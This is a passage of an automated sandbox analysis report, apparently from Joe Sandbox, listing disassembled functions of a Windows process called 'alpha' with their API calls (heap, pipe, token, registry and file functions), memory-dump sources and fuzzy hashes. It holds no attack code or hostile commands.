                                                                                                          • API String ID: 3541575487-0
                                                                                                          • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                          • Instruction ID: 87be7f5663b21a61f35fc9bd410bbd14e959dab317e14ba85f154d4d92fef569
                                                                                                          • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                          • Instruction Fuzzy Hash: 0FA1F5A1B1A25241EE56BB6DF5101B9E2D0AF44BE8F864334DE6E577F5FE3CE4018220
                                                                                                          Function 00007FF7AB126BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • _pipe.MSVCRT ref: 00007FF7AB126C1E
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB126CD1
                                                                                                          • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7AB126CFB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 624391571-0
                                                                                                          • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                          • Instruction ID: 7a406abf5dd72522343252f4b0b8661687164da9dd3d04e29df2c8bfbfcb4d10
                                                                                                          • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                          • Instruction Fuzzy Hash: 47719E71A0A606C6E716BF2CF851079F6A1EF8875CFCA8234DA5D562F5DF3CA4118720
                                                                                                          Function 00007FF7AB1463FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 4268342597-0
                                                                                                          • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                          • Instruction ID: 73581821d5f873b8c7ef0cd767b8e541c24c247d06bb74caa658f819c4310f91
                                                                                                          • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                          • Instruction Fuzzy Hash: AC814162A0A78285EB56AF2DF440239B7A0FB45B8CFDA4175C94D07774EF7CE8858720
                                                                                                          Function 00007FF7AB1388C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: OpenToken$CloseProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2991381754-0
                                                                                                          • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                          • Instruction ID: e0a14c35db6e9feaf2ed728c3d1beb20bbe349ebafe3baed3f497d903b6d8128
                                                                                                          • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                          • Instruction Fuzzy Hash: D921E472A09642C7E746AB58F45027DFB60EB847B8F814135EB49436B8EF7CD848CB10
                                                                                                          Function 00007FF7AB12586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7AB14C59E), ref: 00007FF7AB125879
                                                                                                            • Part of subcall function 00007FF7AB1258D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB125903
                                                                                                            • Part of subcall function 00007FF7AB1258D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB125943
                                                                                                            • Part of subcall function 00007FF7AB1258D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB125956
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValueVersion
                                                                                                          • String ID: %d.%d.%05d.%d
                                                                                                          • API String ID: 2996790148-3457777122
                                                                                                          • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                          • Instruction ID: d2b483892175b66d41da819d7113f3b7f83c4db4b5f6a112809f871756429eea
                                                                                                          • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                          • Instruction Fuzzy Hash: B2F0A771A0838187D311AF19F48006AE651FB88784F908134D94A07B79CF3CD514CB50
                                                                                                          Function 00007FF7AB137854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$ErrorFileFindFirstLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 2831795651-0
                                                                                                          • Opcode ID: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                                          • Instruction ID: 57fb2a336cacc917a4e3515e5997422f7db161589f29658fdc53cd544eb06d33
                                                                                                          • Opcode Fuzzy Hash: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                                          • Instruction Fuzzy Hash: 2CD1D47260A68286E7A9AF28F4406AAB7E0FB4479CF961135DE4D077B8EF3CD444C710
                                                                                                          Function 00007FF7AB127D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00007FF7AB127DA1
                                                                                                            • Part of subcall function 00007FF7AB13417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB1341AD
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB127EB7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                                          • String ID:
                                                                                                          • API String ID: 168394030-0
                                                                                                          • Opcode ID: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                                          • Instruction ID: f74c404ebf561aff8f69fefb03325ff00650d055b50c986e4ac7835aa25f1d48
                                                                                                          • Opcode Fuzzy Hash: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                                          • Instruction Fuzzy Hash: 21A10B21B0A64285FB5AAB2DF4902BAA3A1FF8478CF814135D91E476F5FF3DE4458720
                                                                                                          Function 00007FF7AB1389E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InformationQueryToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 4239771691-0
                                                                                                          • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                          • Instruction ID: 2b4950cfdda90b17435d033f536c00d8ca78f5003322497429abac51eadf8bf1
                                                                                                          • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                          • Instruction Fuzzy Hash: 41114CB6608781CAEB119B05F4403A9FBA4FB84799F814231DA48037B4EB7CD588CB10
                                                                                                          Function 00007FF7AB138114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileInformation$HandleQueryVolume
                                                                                                          • String ID:
                                                                                                          • API String ID: 2149833895-0
                                                                                                          • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                          • Instruction ID: 7cb7d99ed07c7c91ed34bee133534eb272f25f3f72c08b0aa5a86242b1fc5b30
                                                                                                          • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                          • Instruction Fuzzy Hash: E01191316097828AEB619B18F4403AAFBA0FB44B5CF814531DA9D42A74DFBCD48CCB10
                                                                                                          Function 00007FF7AB148654 Relevance: 3.0, APIs: 2, Instructions: 39timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7AB144227), ref: 00007FF7AB148678
                                                                                                          • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF7AB144227), ref: 00007FF7AB1486D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$System$File
                                                                                                          • String ID:
                                                                                                          • API String ID: 2838179519-0
                                                                                                          • Opcode ID: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                                                          • Instruction ID: 34bf963f32bdbb0bfbba0c1fa4a8a801553503298d01afa2b3b54fad76e8b14e
                                                                                                          • Opcode Fuzzy Hash: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                                                          • Instruction Fuzzy Hash: 18117056529681C5D7249F29F04013AB770FF9CB09B555122FA8D83774EB3CC542CB29
                                                                                                          Function 00007FF7AB128510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • towupper.MSVCRT ref: 00007FF7AB1285D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                                          • String ID:
                                                                                                          • API String ID: 3520273530-0
                                                                                                          • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                          • Instruction ID: f7ad4551604b8e0ee8d83930d4741ce5575a6597d9bb735f00781aca3f4fd096
                                                                                                          • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                          • Instruction Fuzzy Hash: 7C61C721A0A202C5F7AA7F2CF144379AAA0FF0575CF824136DA1E562F5FF3DA5958321
                                                                                                          Function 00007FF7AB13898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InformationQueryToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 4239771691-0
                                                                                                          • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                          • Instruction ID: dc1c2ca50e3081627044ee031360954f0edb761462f1b9399163398691d38201
                                                                                                          • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                          • Instruction Fuzzy Hash: AFF030B7704B81CBD7019F68F58849CBB78F744B88795853ACB2903714DB75D9A4CB50
                                                                                                          Function 00007FF7AB1393B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB1393BB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                          • Instruction ID: 746d9e2c45f7ac18d08ebc9750cc8871755d5dfc041dce6fde68701a52c4bb2c
                                                                                                          • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                          • Instruction Fuzzy Hash: 28B09250E26402D1D60ABB39FC810A452A07B98714FC21471C00F81170EE2C929B8720
                                                                                                          Function 00007FF7AB12F8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7AB12F52A,00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F8DE
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F8FB
                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F951
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F96B
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FA8E
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB12FB14
                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FB2D
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FBEA
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB12F996
                                                                                                            • Part of subcall function 00007FF7AB130010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7AB14849D,?,?,?,00007FF7AB14F0C7), ref: 00007FF7AB130045
                                                                                                            • Part of subcall function 00007FF7AB130010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7AB14F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB130071
                                                                                                            • Part of subcall function 00007FF7AB130010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB130092
                                                                                                            • Part of subcall function 00007FF7AB130010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB1300A7
                                                                                                            • Part of subcall function 00007FF7AB130010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB130181
